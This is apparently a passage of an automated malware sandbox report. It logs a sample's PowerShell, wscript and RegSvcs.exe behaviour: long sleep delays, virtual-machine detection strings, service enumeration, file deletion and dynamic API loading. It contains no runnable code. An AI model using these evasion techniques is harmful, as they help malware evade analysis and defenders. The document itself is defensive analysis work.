                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 27_2_0040F7A7 Sleep,ExitProcess, 27_2_0040F7A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 27_2_0041A748
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (34 identical events)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer (5 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1918
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1080
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4631
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4465
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6061
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3448
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1353
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 415
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 9198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: foregroundWindowGot 1756
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2367
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 603
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 490
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2179
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 692
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3080
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 816
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 751
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 710
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 372
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1091
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1178
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 628
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3663
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3006
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 381
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 6.1 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032 Thread sleep count: 4631 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012 Thread sleep count: 4465 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1544 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6972 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3084 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140 Thread sleep count: 6061 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140 Thread sleep count: 3448 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480 Thread sleep count: 1353 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6420 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7056 Thread sleep count: 1767 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6428 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 344 Thread sleep count: 2367 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6980 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7004 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732 Thread sleep count: 603 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720 Thread sleep count: 133 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892 Thread sleep count: 490 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976 Thread sleep count: 2179 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976 Thread sleep count: 692 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep count: 3080 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5104 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep count: 816 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3548 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156 Thread sleep count: 751 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496 Thread sleep count: 710 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2936 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620 Thread sleep count: 904 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4464 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1104 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488 Thread sleep count: 1091 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708 Thread sleep count: 1178 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680 Thread sleep count: 2329 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684 Thread sleep count: 628 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1272 Thread sleep count: 3663 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6464 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136 Thread sleep count: 3006 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6260 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3852 Thread sleep count: 381 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6272 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448 Thread sleep count: 984 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6728 Thread sleep count: 290 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6812 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,27_2_00409253
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,27_2_0041C291
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,27_2_0040C34D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,27_2_00409665
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,27_2_0040880C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040783C FindFirstFileW,FindNextFileW,27_2_0040783C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,27_2_00419AF5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,27_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,27_2_0040BD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,27_2_00407C97
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: powershell.exe, 00000015.00000002.3224877117.0000023A52FB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                        Source: wscript.exe, 0000000F.00000002.1944222598.000001DBF80EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: wscript.exe, 00000012.00000003.1953306728.000002216E9C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S
                        Source: RegSvcs.exe, 00000008.00000002.3324391807.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: powershell.exe, 00000024.00000002.2184970580.000001B993CA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                        Source: powershell.exe, 00000003.00000002.2969820303.0000029B32BC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                        Source: powershell.exe, 00000024.00000002.3260194721.000001B9ABDAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_004349F9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,27_2_0041CB50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004432B5 mov eax, dword ptr fs:[00000030h]27_2_004432B5
